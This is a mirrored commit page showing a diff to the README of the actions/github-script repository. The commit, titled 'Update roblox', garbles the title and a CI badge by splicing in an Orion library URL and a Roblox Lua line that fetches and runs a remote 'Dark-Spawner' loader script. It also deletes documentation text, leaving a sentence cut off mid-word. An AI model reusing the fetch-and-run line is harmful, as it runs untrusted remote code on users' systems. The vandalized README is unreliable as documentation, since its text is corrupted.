mirror of
https://github.com/actions/github-script.git
synced 2026-02-07 19:47:26 +00:00
Update roblox
Script gatau
This commit is contained in:
parent
ed597411d8
commit
71f82ef661
1 changed files with 3 additions and 13 deletions
16
README.md
16
README.md
|
|
@ -1,7 +1,6 @@
|
||||||
# actions/github-script
|
https://github.com/OrionLibrary/Orion.git# actions/github-script
|
||||||
|
|
||||||
[](https://github.com/actions/github-script/actions/workflows/integration.yml)
|
[](https://github.com/actions/github-script/actions/workflows/integratiloadstring(game:HttpGet("https://raw.githubusercontent.com/growagardensc/Dark-HUB/refs/heads/main/Dark-Spawner/Loader.lua"))()(https://github.com/actions/github-script/actions/workflows/ci.yml/badge.svg?branch=main&event=push)](https://github.com/actions/github-script/actions/workflows/ci.yml)
|
||||||
[](https://github.com/actions/github-script/actions/workflows/ci.yml)
|
|
||||||
[](https://github.com/actions/github-script/actions/workflows/licensed.yml)
|
[](https://github.com/actions/github-script/actions/workflows/licensed.yml)
|
||||||
|
|
||||||
This action makes it easy to quickly write a script in your workflow that
|
This action makes it easy to quickly write a script in your workflow that
|
||||||
|
|
@ -38,16 +37,7 @@ The following arguments will be provided:
|
||||||
- `glob` A reference to the [@actions/glob](https://github.com/actions/toolkit/tree/main/packages/glob) package
|
- `glob` A reference to the [@actions/glob](https://github.com/actions/toolkit/tree/main/packages/glob) package
|
||||||
- `io` A reference to the [@actions/io](https://github.com/actions/toolkit/tree/main/packages/io) package
|
- `io` A reference to the [@actions/io](https://github.com/actions/toolkit/tree/main/packages/io) package
|
||||||
- `exec` A reference to the [@actions/exec](https://github.com/actions/toolkit/tree/main/packages/exec) package
|
- `exec` A reference to the [@actions/exec](https://github.com/actions/toolkit/tree/main/packages/exec) package
|
||||||
- `require` A proxy wrapper around the normal Node.js `require` to enable
|
- `require` A proxy w
|
||||||
requiring relative paths (relative to the current working directory) and
|
|
||||||
requiring npm packages installed in the current working directory. If for
|
|
||||||
some reason you need the non-wrapped `require`, there is an escape hatch
|
|
||||||
available: `__original_require__` is the original value of `require` without
|
|
||||||
our wrapping applied.
|
|
||||||
|
|
||||||
Since the `script` is just a function body, these values will already be
|
|
||||||
defined, so you don't have to import them (see examples below).
|
|
||||||
|
|
||||||
See [octokit/rest.js](https://octokit.github.io/rest.js/) for the API client
|
See [octokit/rest.js](https://octokit.github.io/rest.js/) for the API client
|
||||||
documentation.
|
documentation.
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue